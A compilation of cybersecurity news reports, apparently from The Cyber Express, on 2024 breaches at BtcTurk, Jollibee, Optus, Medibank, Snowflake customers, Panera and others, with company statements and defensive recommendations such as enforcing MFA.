Cryptocurrency investigator ZachXBT hinted at a potential link between the BtcTurk breach and a $54 million Avalanche transfer. The transfer, involving 1.96 million AVAX to Coinbase and subsequent Bitcoin withdrawals from Binance, coincided suspiciously with the timing of the cyberattack on BtcTurk. [caption id="attachment_78620" align="alignnone" width="755"] Source: X[/caption] Despite the setback, BtcTurk announced plans to gradually restore crypto deposit and withdrawal services once their cybersecurity measures are completed. They emphasized that their financial resilience surpasses the amount lost in the attack, ensuring that user assets remain unaffected. “Our teams have detected that there was a cyber attack on our platform on June 22, 2024, which caused uncontrolled footage to be taken. Only some of the balances in the hot wallets of 10 cryptocurrencies were affected by the cyber attack in question, and our cold wallets, where most of the assets are kept, are safe. BtcTurk's financial strength is well above the amounts affected by this attack, and user assets will not be affected by these losses”, reads the organization's statement.Mitigation Against the Cyberattack on BtcTurk
The BtcTurk cyberattack specifically impacted deposits of various cryptocurrencies, including Bitcoin (BTC), Aave (AAVE), Algorand (ALGO), Ankr (ANKR), Cardano (ADA), Avalanche (AVAX), ApeCoin (APE), Axie Infinity (AXS), Chainlink (LINK), Cosmos (ATOM), Filecoin (FIL), among others, says BtcTurk's. “Our teams are carrying out detailed research on the subject. At the same time, official authorities were contacted. As a precaution, cryptocurrency deposits and withdrawals have been stopped and will be made available for use as soon as our work is completed. You can follow the current status of the transactions on https://status.btcturk.com”, concludes the statement. As investigations continue, both BtcTurk and Binance are working diligently to mitigate the impact of the cyberattack and strengthen their security protocols to prevent future incidents. Users are encouraged to monitor official channels for updates on the situation. By collaborating and taking swift action, Binance and BtcTurk aim to uphold trust within the cryptocurrency community while enhancing the resilience of their platforms against online threats.- Cybersecurity News and Magazine
- Jollibee Cyberattack: Data of 32 Million Customers of Fast Food Chain Allegedly Compromised
Jollibee Cyberattack: Data of 32 Million Customers of Fast Food Chain Allegedly Compromised
Details of Jollibee Cyberattack
The data breach of the fast-food chain was posted by the threat actor on popular data hack site BreachForums. The threat actor stated that “Jollibee is a Filipino chain of fast-food restaurants owned by Jollibee Foods Corporation. As of September 2023, there were over 1,500 Jollibee outlets worldwide, with restaurants in Southeast Asia, East Asia, the Middle East, North America, and Europe.” [caption id="attachment_78479" align="alignnone" width="1950"] Source: X[/caption] The threat actor claimed to have carried out a cyberattack and had gained access to the data of 32 million Jollibee customers, including their names, addresses, phone numbers, email addresses and hashed passwords. The hacker also allegedly exfiltrated 600 million rows of data related to food delivery, sales orders, transactions and service details. To support these claims, the TA included a sample in tabular data format accessible through spreadsheet programs like Microsoft Excel and Google Sheets. While the exact details of the alleged data breach remains unclear, the potential impact on millions of customers is cause for concern.Jollibee Yet to React to Cyberattack Claims
The motive behind the Jollibee cyberattack remains unknown. So far, Jollibee Foods Corporation has not reacted or issued any official statement regarding the alleged data breach. The Cyber Express has reached out to the corporation to verify the claims. This article will be updated once the company responds to the allegations and shares any preventive measures in place to prevent critical data from being misused. The Philippines National Privacy Commission (NPC) has yet to receive any notification from Jollibee Foods Corporation regarding the breach. The NPC regulations require organizations to inform affected individuals and report such incidents within 72 hours of discovery.Jollibee Cyberattack Threat Actor Responsible for Snowflake Breach
While Jollibee investigates the claims made by “Sp1d3r”, the threat actor has been responsible for several recent breaches, which includes many customers of third-party cloud data storage vendor Snowflake. On June 1, “Sp1d3r” posted on the cybercriminal platform BreachForums that they had stolen the sensitive information of over 190 million people from QuoteWizard. The alleged database included customer details, partial credit card numbers, insurance quotes, and other information. The same threat actor was responsible for the data breach at American automobile aftermarket component supplier Advance Auto Parts, Inc. The attacker “Sp1d3r” claimed to have stolen three terabytes of customer data from the company’s Snowflake cloud storage and was selling the data for US$1.5 million. In its report, the company stated that the cyberattack could create damages up to $3 million. The Jollibee Cyberattack is a stark reminder of the vulnerabilities of the digital world, where even the largest and most established companies could become victims of notorious data hackers. Customers should stay vigilant and follow any further guidance provided by Jollibee and cybersecurity professionals. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.- Cybersecurity News and Magazine
- 2022 Optus Data Breach Could Have Been Averted Four Years Prior, Says Australian Telecom Watchdog
2022 Optus Data Breach Could Have Been Averted Four Years Prior, Says Australian Telecom Watchdog
Coding Error and API Mismanagement Led to Optus Data Breach
The ACMA claimed that Optus had access controls in place for the API but a coding error inadvertently weakened these controls allowing them to be bypassed. This error left the API vulnerable, especially since it was internet-facing and dormant for an extended period. The vulnerability was reportedly introduced through a coding error in September 2018 and was first noticed in August 2021. But this issue was only fixed for the main site – www.optus.com.au – and not the subdomain (likely api.www.optus.com.au) where the vulnerable API endpoint was hosted.“The coding error was not identified by Optus until after the cyberattack had occurred in mid-September 2022. Optus had the opportunity to identify the coding error at several stages in the preceding four years including: when the coding change was released into a production environment in September 2018; when the Target Domain (and the Main Domain) became internet-facing through the production environment in June 2020; and when the coding error was detected for the main domain in August 2021.” – ACMABut the company failed to do so causing alleged harm to more than one-third (approximately 36%) of the Australian population. The telco watchdog alleged that Optus’ failure to protect customer data constitutes a breach of its obligations under Australian law.
Optus’ Response to ACMA’s Allegations
Optus, in a statement to The Cyber Express, confirmed the vulnerability and provided details on the cyberattack. “The cyberattack resulted from the cyber attacker being able to exploit a previously unknown vulnerability in our defenses that arose from a historical coding error,” said Interim CEO of Optus Michael Venter.“This vulnerability was exploited by a motivated and determined criminal as they probed our defenses, and then exploited and evaded these defenses by taking steps to bypass various authentication and detection controls that were in place to protect our customers’ data. The criminal did this by mimicking usual customer activity and rotating through tens of thousands of different IP addresses to evade detection.” – Michael Venter, Interim CEO of OptusVenter said following the 2022 Optus data breach, the company has reviewed and updated its systems and processes. It has invested in heightened cyber defenses to address the increased global cyber risk environment. The company expressed regret over the incident and emphasized its commitment to protecting customer data. “Our customers expected their information would remain safe. We accept that this did not happen, and the cyber attacker gained unauthorised access to some of their information,” Venter said. Optus suffered a major customer data breach in 2022 that gave malicious actors access to about 9.5 million former and current customers' sensitive information including names, birth dates, phone numbers, email addresses and, for a subset of customers (2,470,036), addresses and ID document numbers such as driver’s license or passport numbers. Of these, the hacker also released the personally identifiable information (PII) of 10,200 Optus customers on the dark web.
Deloitte Report Handed to the Federal Court
Post the hack, although the privacy commissioner and ACMC held detailed investigations, Optus itself commissioned an independent external review of the cyberattack. Despite attempts to keep the document confidential, the Australian federal court ordered Optus last month to file this report with the court, which is expected to provide crucial insights into the breach. “Optus is working with the ACMA and separately Slater and Gordon with the intention of providing them with a confidential version of the Deloitte Report that appropriately protects our customer data and systems from cybercriminals,” Venter told The Cyber Express. The forensic report prepared by Deloitte detailing the technical aspects of the breach was finally handed over to the federal court on Friday. The details revealed in this report will also be used in a separate class action against Optus.“Much to do to Fully Regain our Customers’ Trust”
Optus has acknowledged the breach’s impact on customer trust, with Venter expressing deep regret for the incident. Optus has reimbursed 20,071 current and former customers for the cost of replacing identity documents. The company is also covering costs incurred by government agencies related to the breach. Optus has pledged to cooperate with the ACMA’s investigation and defend its actions in court, aiming to correct any misconceptions and improve its cybersecurity measures.“Optus recognizes that we still have much to do to fully regain our customers’ trust and we will continue to work tirelessly towards this goal,” – Michael VenterThe Optus data breach highlights the critical importance of robust access controls and diligent monitoring of cybersecurity vulnerabilities. The incident serves as a cautionary tale for organizations worldwide to ensure comprehensive protection of sensitive data and maintain customer trust through proactive and transparent security practices. As the case progresses, it will provide further insights into the complexities of cybersecurity in the telecommunications sector and the measures necessary to prevent similar breaches in the future.
- Cybersecurity News and Magazine
- Apparent Ransomware Attack Halts Operations at Crown Equipment for Second Week
Apparent Ransomware Attack Halts Operations at Crown Equipment for Second Week
Crown Equipment Cyberattack Overview
Since approximately June 8th, Crown's employees reported a breach in the company's IT systems. This breach led to a complete shutdown of systems, preventing employees from clocking in their hours, accessing service manuals, and in some cases delivering machinery. In an internal email sent to employees, the heavy machinery manufacturer confirmed the cyberattack and advised employees to ignore multifactor authentication (MFA) requests and to be cautious of phishing emails."I currently work there. Everyone is scrambling, can't order parts except for TVH and that's strictly for emergencies. The company hasn't officially announced that it's been hacked but they keep pushing the importance of MFA. We can read between the lines." - Reddit User (Williams2242)The company in its press release revealed that the breach necessitated the shutdown of their operating systems to investigate and resolve the issue without giving details on the hackers and their ransom demand, if any.
Crown Equipment Attack Details
Crown disclosed that many of their security measures were effective in limiting data access by the criminals. However, the breach likely occurred due to an employee not adhering to data security policies that resulted in unauthorized access to their device, according to a Reddit post."I heard someone got a call from a hacker pretending to be IT. They installed a fake VPN on their computer and got access to everything. They created a privileged account on the network that gave them access all the systems. The network went down Sunday and it's been down since with no ETA." - Reddit User (DragonflyJust2223)This speculation suggests a social engineering attack where the threat actor installed remote access software on the employee's computer. BornCity, a website maintained by a German-speaking digital observer, first reported the possibility of a hack nearly a week ago. Citing a distant source who used to work at the manufacturing plant of Crown, BornCity said the problems were likely due to a 'coding bug.' "This had sent the Crown 360 (a service likely based on the Microsoft Cloud and Office 365) solution downhill – but I take that information not as reliable." Crown Equipment, however, did not confirm the speculation and thus the claims remain unverified.
Impact on Crown Equipment's Employees
Initially, Crown told employees they would need to file for unemployment or use their paid time off (PTO) and vacation days to receive pay for missed days. Last weekend, this directive was updated and the employees were asked to file for unemployment, after which several took to Reddit to vent their discontent."The fact that their not paying people for their mistake is straight bu****it. Crown pretends to be a family company but as soon as they need to support their "family" they shaft them. People need this money to live, while the owner can just sit back and chill with his multi-millions in the bank. Crown needs to take the hit and do the right thing." - Reddit UserAnother said: [caption id="attachment_78309" align="aligncenter" width="1024"] Source: Reddit[/caption] However, Crown later decided to provide regular pay as an advance, allowing employees to compensate for the lost hours later. Despite this adjustment, employees expressed frustration over the lack of transparency and communication from the company during the incident. Crown Equipment has reportedly engaged some of the world’s top cybersecurity experts and the FBI to analyze the affected data and manage the aftermath of the attack. The company emphasized that there were no indications that employee personal information or data that could facilitate identity theft was targeted. The company is now in the process of restoring systems and transitioning back to normal business operations. They are also working closely with customers to minimize the disruption's impact on their operations. Although Crown did not specify the type of cyberattack, their description suggests a ransomware attack by an international cybercriminal organization. If confirmed, this implies that corporate data was likely stolen and could be leaked if the ransom demands are not met. As Crown continues to recover from this significant disruption, the incident serves as a reminder for companies worldwide to strengthen their cybersecurity protocols, including isolating critical workloads, invest in employee training to prevent social engineering attacks, and establish effective communication strategies for managing cyber incidents.
- Cybersecurity News and Magazine
- Advance Auto Parts Confirms Data Breach in SEC Filing; Reports Losses Around $300,000
Advance Auto Parts Confirms Data Breach in SEC Filing; Reports Losses Around $300,000
Details of Advance Auto Parts SEC Filing
In its declaration to the SEC, auto parts seller said that “There has been no material interruption to the Company's business operations due to the incident. “Based on the review of files determined to have been impacted, the Company believes that some files contain personal information, including but not limited to social security numbers or other government identification numbers of current and former job applicants and employees of the Company,” the filing said. Advance Auto Parts said that the company would share information about the data breach and would offer free credit monitoring and identity restoration services to the impact parties. The company noted that though it was covered by insurance, the cyberattack could cost damages up to $3 million. “The Company has insurance for cyber incidents and currently expects its costs related to response and remediation to be generally limited to its retention under such policy. The Company currently plans to record an expense of approximately $3 million for the quarter ending July 13, 2024, for such costs,” it said to the SEC. Advance Auto Parts currently operates 4,777 stores and 320 Worldpac branches primarily within the United States, with added locations in Canada, Puerto Rico, and the U.S. Virgin Islands. The Advance Auto Parts data breach is part of a recent series of attacks targeting customers of the cloud storage company Snowflake. These attacks have been taking place since at least mid-April 2024. Snowflake acknowledged the issue in a statement, informing a limited number of customers who they believe may have been impacted by the attacks. Snowflake is a prominent U.S.-based cloud data storage and analytics company, with over 9,800 global customers. Many of Snowlflakes’ clients had reportedly taken down their databases after the series of cyberattacks. Infact, a comprehensive report revealed that 165 customers were impacted by the Snowflake data breach. It was on July 26, 2023 that the US Securities and Exchange Commission directed companies to mandatorily declare material cybersecurity incidents they experience and to disclose on an annual basis material information regarding their cybersecurity risk management, strategy, and governance.Lack of MFA Implementation Likely Caused Medibank Data Breach
The Sequence of Events in the Medibank Breach
The attack on Medibank began when an IT service desk operator at a third-party contractor used his personal browser profile on a work computer and inadvertently synced his Medibank credentials to his home computer. This home device was infected with information-stealing malware, which allowed hackers to obtain these credentials, including those with elevated access permissions. The attackers first breached Medibank’s Microsoft Exchange server using these credentials on August 12, 2022, before logging into Medibank’s Palo Alto Networks Global Protect VPN. Incidentally, the VPN did not require multi-factor authentication (MFA), making it easier for the attackers to gain access. It was only in mid-October that Medibank brought in a threat intelligence firm to investigate a Microsoft Exchange ProxyNotShell incident, when they discovered data was previously stolen in a cyberattack."During the Relevant Period, the Admin Account had access to most (if not all) of Medibank's systems, including network drives, management consoles, and remote desktop access to jump box servers (used to access certain Medibank directories and databases)." - the OAIC report.
Security Failures and Missed Alerts
Lack of Multi-Factor Authentication (MFA)
One of the critical failures in the Medibank breach was the health insurer’s neglect to implement MFA for VPN access. The OAIC report said that during the relevant period, the VPN was configured to allow access with just a device certificate or a username and password. It did not require the additional security layer provided by MFA. This oversight significantly lowered the barrier for unauthorized access.Operational and Alert Management Failures
Despite receiving several security alerts from their Endpoint Detection and Response (EDR) software about suspicious activities on August 24 and 25, these alerts were not appropriately triaged or escalated. This delay allowed the attackers to continue their operations undetected for an extended period, which ultimately led to the exfiltration of approximately 520 gigabytes of sensitive data from the company's MARS Database and MPLFiler systems.Data Compromised and Consequences
The stolen data included highly sensitive information such as customers' names, dates of birth, addresses, phone numbers, email addresses, Medicare numbers, passport numbers and extensive health-related data. The exposure of such information has severe implications for the affected individuals, ranging from identity theft to potential misuse of medical data in various frauds and scams. The attackers linked to the ransomware gang BlogXX, which is believed to be an offshoot of the notorious REvil group, leaked the data on the dark web. This incident not only caused significant distress to millions of Australians but also highlighted the grave consequences of inadequate cybersecurity measures.Legal and Regulatory Actions Follow
The OAIC said that Medibank was aware “of serious deficiencies in its cybersecurity and information security,” prior to the hack. For example, citing an Active Directory Risk Assessment report from Datacom in June 2020, OAIC said Medibank had an excessive number of individuals who had access to Active Directory (being the Microsoft directory service used for management of all Medibank users, group policies and domains)."A number of individuals had been given excessive privileges to perform simple daily routines, and that MFA had not been enabled for privileged and nonprivileged users which was described as a “critical” defect."
Given the nature and the volume of the data Medibank stores and collects, “it was reasonable” for the company to adopt the security measures recommended by Australia’s privacy regulator, but “these measures were not implemented, or, alternatively, not properly implemented or enforced, by Medibank,” OAIC said.
Thus, in response to the breach and the negligence that led to it, Australia's data protection regulator OAIC, announced legal action against Medibank for failing to protect personal information. The company faces potential fines exceeding AU$2 million.A spokesperson for the health insurer did not detail the plan of action against the lawsuit but earlier told The Cyber Express that ”Medibank intends to defend the proceedings.”
Medibank Hacker Sanctioned and Arrested
Earlier this year, the U.S., Australia, and the U.K. sanctioned Aleksandr Gennadievich Ermakov, believed to be behind the 2022 Medibank hack. Ermakov, also known by aliases such as AlexanderErmakov and JimJones, was subsequently arrested by Russian police along with two others for violating Article 273, which prohibits creating or spreading harmful computer code. Extradition of Ermakov is unlikely given the current political climate.Lessons and Recommendations
The Medibank breach underscores several critical lessons for organizations regarding cybersecurity: 1. Implementation of Multi-Factor Authentication: Utilizing MFA for all access points, especially VPNs, is essential. MFA adds an additional layer of security, making it significantly harder for attackers to exploit stolen credentials. 2. Proper Alert Management: Organizations must ensure that security alerts are promptly and effectively managed. Implementing robust procedures for triaging and escalating suspicious activities can prevent prolonged unauthorized access. 3. Regular Security Audits: Conducting regular security audits to identify and rectify vulnerabilities is crucial. These audits should include evaluating the effectiveness of existing security measures and compliance with best practices. 4. Employee Training: Continuous training for employees on cybersecurity best practices, including safe browsing habits and the importance of using corporate credentials responsibly, is vital to minimize the risk of breaches originating from human error.- Cybersecurity News and Magazine
- IntelBroker Claims Apple Data Breach, Access to Source Code of Internal Tools
IntelBroker Claims Apple Data Breach, Access to Source Code of Internal Tools
Decoding Apple Data Breach Claims
Per the available information, IntelBroker allegedly breached Apple’s security in June 2024 and has managed to lay hands on the internal source code of three commonly used Apple tools, namely, AppleConnect-SSO, Apple-HWE-Confluence-Advanced and AppleMacroPlugin. The information was posted by the threat actor on BreachForums, a high-profile platform for trading stolen data and hacking tools. “I'm releasing the internal source code to three of Apple's commonly used tools for their internal site, thanks for reading and enjoy!” the TA posted. AppleConnect is the Apple-Specific Single Sign-On (SSO) and authentication system that allows a user to access certain applications inside Apple's network. Apple-HWE-Confluence-Advanced might be used for team projects or to share some information inside the company, and AppleMacroPlugin is presumably an application that facilitates certain processes in the company. Apple has not yet responded to the alleged data breach by IntelBroker or the leaked code. However, if the data breach occurred as claimed, it may lead to the exposure of important information that could be sensitive to the workings and operations of Apple. If legitimate, this breach could compromise Apple's internal operations and workflow. Leaked source code could expose vulnerabilities and inner workings of these tools. The Cyber Express has reached out to Apple to learn more about the potential data breach. However, at the time of publication, no official statement or response has been received, leaving the claims for the Apple data leak unconfirmed for now. The article will be updated as soon as we receive a response from the tech giant.Previous Attacks by IntelBroker
The alleged data breach at Apple could prove significant considering the history of the threat actor. IntelBroker is believed to be a mature threat actor and is known to have been responsible for high-profile intrusions in the past. On June 18th, 2024, chipmaker AMD acknowledged that they were investigating a potential data breach by IntelBroker. The attacker claimed to be selling stolen AMD data, including employee information, financial documents, and confidential information. Last month, the threat actor is believed to have breached data of European Union’s law enforcement agency, Europol’s Platform for Experts (EPE). Some of the other organizations that the attacker is believed to have breached data include Panda Buy, Home Depot, and General Electric. The hacker also claimed to have targeted US Citizenship and Immigration Services (USCIS) and Facebook Marketplace.Apple's Security Posture
Apple prides itself on its robust security measures and user privacy. However, the company has faced security threats in the past. In December 2023, Apple released security updates to address vulnerabilities in various Apple products, including iOS, iPadOS, macOS, tvOS, watchOS, and Safari. One critical vulnerability patched allowed attackers to potentially inject keystrokes by mimicking a keyboard. This incident highlights the importance of keeping software updated to mitigate security risks. In November 2023, there were reports of a state-sponsored attack targeting Apple iOS devices used in India. While details about this attack remain scarce, it serves as a reminder that even Apple devices are susceptible to cyberattacks.Looking Ahead
The situation with IntelBroker's claims is ongoing. If the leak is verified, Apple will likely need to take steps to mitigate the potential damage. This could involve patching vulnerabilities in the leaked code and improving internal security measures. It is important to note that these are unconfirmed reports at this stage. However, they serve as a stark reminder of the ever-evolving cyber threat landscape. Apple, and all tech companies for that matter, must constantly work to stay ahead of determined attackers like IntelBroker. For users, it is a reminder to be vigilant about potential phishing attempts or malware that could exploit these alleged vulnerabilities. Keeping software updated and practicing good cyber hygiene are crucial steps for protecting yourself online.- Cybersecurity News and Magazine
- Maxicare Confirms Data Breach in Third-Party Booking Platform, Ensures Core Systems Unaffected
Maxicare Confirms Data Breach in Third-Party Booking Platform, Ensures Core Systems Unaffected
Maxicare Data Breach: Immediate Response and Investigation
Upon learning of the potential security breach, Maxicare promptly initiated emergency measures to safeguard the privacy and security of the affected members. The company has launched a comprehensive investigation in collaboration with data security professionals and an industry-leading cybersecurity firm. "We launched an investigation together with a team of data security professionals and in partnership with an industry-leading cybersecurity firm," said a spokesperson from Maxicare. "Our team is fully adhering to all regulatory requirements by the National Privacy Commission. We will continue to communicate with our valued members on this matter."Background on the Maxicare Security Breach
The security breach specifically involved the booking platform of Lab@Home, which facilitates home care services for Maxicare members. The information compromised includes details used for booking requests. Importantly, no sensitive medical records were accessed or compromised during this incident. Lab@Home's database is entirely separate from Maxicare's primary systems, which helps contain the breach and prevents it from spreading to other parts of Maxicare’s infrastructure. Maxicare is taking proactive steps to address the recent security incident involving unauthorized access to member information. Through immediate action, rigorous investigation, and ongoing communication, the company aims to ensure the continued trust and safety of its members. TCE will provide further updates as the situation evolves and more information becomes available.- Cybersecurity News and Magazine
- Phishing Attack at Los Angeles County Department of Public Health Leads to Major Data Breach
Phishing Attack at Los Angeles County Department of Public Health Leads to Major Data Breach
Data Breach at Los Angeles County DPH: What Happened
The phishing email, designed to appear legitimate, tricked employees into divulging their credentials by clicking on a malicious link. This unauthorized access led to a wide-ranging compromise of data, affecting various individuals associated with DPH, including clients, employees, and others. The compromised email accounts contained a wealth of sensitive data. The potentially exposed information includes:- First and last names
- Dates of birth
- Diagnosis and prescription details
- Medical record numbers/patient IDs
- Medicare/Med-Cal numbers
- Health insurance information
- Social Security numbers
- Other financial information
Data Breach at Los Angeles County DPH Notification
DPH is taking extensive steps to notify all potentially affected individuals. Notifications are being sent via post to those whose mailing addresses are available. For individuals without a mailing address, DPH also posts a notice on its website to provide necessary information and resources. The department has advised impacted individuals to review the content and accuracy of their medical records with their healthcare providers. However, on delay in notification, Los Angeles County DPH said, “Due to an investigation by law enforcement, we were advised to delay notification of this incident, as public notice may have hindered their investigation.” To assist in protecting against potential misuse of their information, DPH is offering one year of free identity monitoring services through Kroll, a global leader in risk mitigation and response. “To help relieve concerns and restore confidence following this incident, we have secured the services of Kroll, a global leader in risk mitigation and response, to provide identity monitoring for one year at no cost to affected clients,” reads the notice.Response and Preventive Measures
Upon discovering the Los Angeles County DPH data breach, DPH took immediate action to mitigate further risks. The department disabled the affected email accounts, reset and re-imaged the users’ devices, blocked the websites involved in the phishing campaign, and quarantined all suspicious incoming emails. Additionally, DPH has implemented numerous security enhancements to prevent similar incidents in the future. Awareness notifications have been distributed to all workforce members, reminding them to be vigilant when reviewing emails, especially those containing links or attachments. These measures aim to bolster the department’s defense against phishing attacks and other cyber threats. The incident was promptly reported to law enforcement authorities, who investigated the breach. The US Department of Health and Human Services’ Office for Civil Rights and other relevant agencies are also notified, as required by law and contractual obligations.Steps for Individuals to Protect Themselves
While DPH cannot confirm whether any information has been accessed or misused, affected individuals are encouraged to take proactive steps to protect their personal information. These steps include:- Reviewing Medical Records: Individuals should review their medical records and Explanation of Benefits statements for any discrepancies or unauthorized services. Any irregularities should be reported to their healthcare provider or health plan.
- Requesting Credit Reports: Individuals should remain vigilant against identity theft and fraud by regularly reviewing their financial statements and credit reports. Under US law, individuals are entitled to one free credit report annually from each of the three major credit reporting bureaus: Equifax, Experian, and TransUnion. Free credit reports can be requested at www.annualcreditreport.com or by calling 1-877-322-8228.
- Placing Fraud Alerts: Individuals can place a fraud alert on their credit files, which notifies creditors to take additional steps to verify identity before granting credit. Fraud alerts can be set up by contacting any of the major credit bureaus.
- Security Freezes: A security freeze can also be placed on credit reports, which prevents credit bureaus from releasing any information without written authorization. This measure can help prevent unauthorized credit activity but may delay the approval of new credit requests.
- Cybersecurity News and Magazine
- The Snowballing of the Snowflake Breach: All About the Massive Snowflake Data Breach
The Snowballing of the Snowflake Breach: All About the Massive Snowflake Data Breach
Why the Snowflake Breach Matters
Snowflake is a prominent U.S.-based cloud data storage and analytics company, with over 9,800 global customers. Its customer base includes major corporations like Adobe, AT&T, Capital One, DoorDash, HP, JetBlue, Mastercard, Micron, NBC Universal, Nielsen, Novartis, Okta, PepsiCo, Siemens, US Foods, Western Union, and Yamaha, among others. Snowflake holds approximately a 20% share of the data warehouse market and was recently ranked #1 on the Fortune Future 50 List, it an attractive target for cybercriminals. However, it is crucial to note that the breaches are not necessarily due to failures by Snowflake. The correlation does not imply causation, as emphasized by Snowflake’s Chief Information Security Officer Brad Jones. The company, along with its forensic partners, found no evidence of vulnerabilities or breaches within Snowflake’s platform.Ongoing Investigation and Preliminary Results in Snowflake Breach
On May 31, Snowflake revealed that attackers accessed customer accounts using single-factor authentication. According to preliminary results, these attackers leveraged credentials obtained through infostealing malware.Compromised Employee Account
Snowflake confirmed that a threat actor obtained credentials from a single former employee, accessing demo accounts that were isolated from production and corporate systems. Snowflake’s core systems are protected by Okta and Multi-Factor Authentication (MFA) but the demo accounts lacked such safeguards.Test Environments Targeted
Demo accounts are often overlooked as security risks. Despite assurances that these accounts do not contain sensitive data, they remain attractive targets due to their perceived value. Cybercriminals exploit the perception gap, knowing that a claimed breach of a high-profile company like Snowflake can generate significant media attention.Attack Path
The initial access point for the attackers was almost certainly compromised credentials obtained through infostealing malware. Mandiant, who helped Snowflake in its investigation, confirmed that the compromised credentials were from customer instances and were traced back to infostealer malware logs. Several variants of infostealer malware were used, including VIDAR, RISEPRO, REDLINE, RACOON STEALER, LUMMA, and METASTEALER.Possible Reasons for the Breach
Mandiant confirmed that there was no breach of Snowflake’s enterprise environment. They identified that most credentials used by the attackers originated from historical infostealer infections. The lack of MFA and failure to rotate credentials for up to four years were significant factors. Network allow lists were also not used to restrict access to trusted locations.Unconfirmed Threat Actor Claims
The threat actor also claimed to have logged into Snowflake’s ServiceNow using the same credentials. This claim has neither been confirmed nor explicitly refuted by Snowflake. Other unknowns include whether similar methods compromised other Snowflake employees, and the definition of "sensitive" data used for determining the impact on demo accounts. The investigation is ongoing, but Snowflake stands by its initial findings.Affected Customers from Snowflake Breach
The data breaches began in April 2024, and the company claimed it had impacted a “limited” number of Snowflake customers. Snowflake initially did not disclose the exact number or the names of all affected customers. However, a comprehensive report from Mandiant two weeks after the initial disclosure revealed that 165 customers were impacted in the Snowflake data breach. While some victims have been identified through attackers’ offers to sell stolen data, others were revealed via mandatory public disclosures. Most companies have yet to confirm the impact. Following is a list of all companies know to have been impacted in the Snowflake data breach:- Santander Group: The company confirmed a compromise without mentioning Snowflake.
- Impact: Santander Bank staff and 30 million customers’ data has allegedly been breached.
- TicketMaster (Live Nation Entertainment subsidiary): Confirmed via an SEC 8-K report, with Snowflake identified as the third party involved.
- Impact: 560 Million TicketMaster user details and card info potentially at risk.
- LendingTree: Notified by Snowflake about a potential data impact involving QuoteWizard.
- Impact: On June 1, a hacker going by the name “Sp1d3r” posted on the cybercriminal platform BreachForums that they had stolen the sensitive information of over 190 million people from QuoteWizard. The alleged database included customer details, partial credit card numbers, insurance quotes and other information.
- Advance Auto Parts: Unconfirmed by the company, but a dark web listing claimed significant data theft.
- Impact: Same actor as LendingTree claimed leak of 380 million customers and 358,000 former and current employees.
- Pure Storage: The Pure Storage data breach involved a third party temporarily gaining access to the workspace, which housed data such as company names, LDAP usernames, email addresses, and the Purity software release version number.
- Impact: The same threat actor known as “Sp1d3r” claimed responsibility, alleging the theft of 3 terabytes of data from the company’s Snowflake cloud storage that was reportedly being sold for $1.5 million.
Security Measures and Customer Support
Snowflake Chief Information Security Officer Brad Jones reiterated the company's findings, asserting that the breaches were not due to any vulnerabilities, misconfigurations, or breaches of Snowflake’s platform or personnel credentials. Snowflake is collaborating with customers to enhance security measures and plans to mandate advanced security controls such as multi-factor authentication (MFA) and network policies, especially for privileged accounts. The company acknowledges the friction in their MFA enrollment process and is working to streamline it. The shared responsibility model places MFA enforcement on customers, but Snowflake aims to make it a standard prerequisite due to the high sensitivity of the data stored in their cloud environments.Key Recommendations for Snowflake Customers:
- Enforce Multi-Factor Authentication: Make MFA mandatory for all accounts, particularly those with privileged access.
- Regularly Rotate Credentials: Ensure that all credentials are regularly updated to prevent long-term exposure from previous leaks.
- Implement Network Allow Lists: Restrict access to trusted IP addresses to minimize unauthorized access.
- Enhance Logging and Monitoring: Improve logging and monitoring capabilities to detect and respond to suspicious activities promptly.
- Cybersecurity News and Magazine
- Hacktivist Group Launches Alleged Cyberattack on Unifi TV, Targeting Malaysian Internet Infrastructure
Hacktivist Group Launches Alleged Cyberattack on Unifi TV, Targeting Malaysian Internet Infrastructure
177 Members Team Claims Unifi TV Cyberattack
[caption id="attachment_77209" align="alignnone" width="525"] Source: Dark Web[/caption] The cyberattack on Unifi TV was aimed at disrupting the operation of the organization and highlighted the importance of robust cybersecurity measures in safeguarding critical digital infrastructure. Despite claims by the threat actor that the Unifi TV website was down, the web pages seem to be operational at the moment and don’t show any immediate sign of the cyberattack. The impact of the cyberattack extends beyond Unifi TV, affecting not only the telecommunications industry but also posing a threat to Malaysia's digital ecosystem as a whole. With the country witnessing over 3,000 cyber attacks daily, according to Defence Minister Datuk Seri Mohamed Khaled Nordin, the cyberattacks on Malaysia highlights the growing nature of ransomware groups and hacktivist collectives targeting the nation.Previous Cybersecurity Incidents
While Unifi TV has yet to release an official statement regarding the cyberattack, concerns about data breaches have been previously raised. In July 2023, Telekom Malaysia issued a data breach alert to Unifi users, stating that personal information, including names, identification numbers, and contact details, may have been compromised. The company assured users that measures had been taken to contain the breach and protect customer data. In light of these incidents, cybersecurity experts emphasize the need for proactive measures to mitigate future threats. Collaborative efforts between government agencies, law enforcement, and private sector entities are crucial in addressing online threats that target Asian nations. As for the current Unifi TV cyberattack claims, this is an ongoing story and The Cyber Express will be closely monitoring the situation. We’ll update this post once we have more information on the alleged attack or any official confirmation from the organization. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.- Cybersecurity News and Magazine
- Panera Bread Hit by Ransomware: Data Breach, Outage, and Unanswered Questions
Panera Bread Hit by Ransomware: Data Breach, Outage, and Unanswered Questions
Panera Bread Data Breach: Impact on Employees and Operations
The ransomware attack has had substantial repercussions on Panera's operations and its employees. Many of Panera's virtual machine systems were reportedly encrypted during the attack, leading to a significant outage that crippled internal IT systems, phones, point of sale systems, the company’s website, and mobile apps. During this outage, employees were unable to access their shift details and had to contact their managers to obtain work schedules. The stores faced further disruption as they could only process cash transactions, with electronic payment systems down. Additionally, the rewards program system was inoperable, preventing members from redeeming their points. The most concerning aspect of the breach for employees is the compromise of sensitive personal information. Panera has confirmed that files containing employee names and Social Security numbers were accessed. There is also the potential that other employment-related information was compromised. However, the company has assured employees that, as of the notification date, there is no evidence that the accessed information has been publicly disseminated. To mitigate the potential impact on affected individuals, Panera is offering a one-year membership to CyEx's Identity Defense Total, which includes credit monitoring, identity detection, and identity theft resolution services. This proactive measure aims to help employees safeguard their identities and respond swiftly to any signs of fraudulent activity.The Bigger Picture: Unanswered Questions
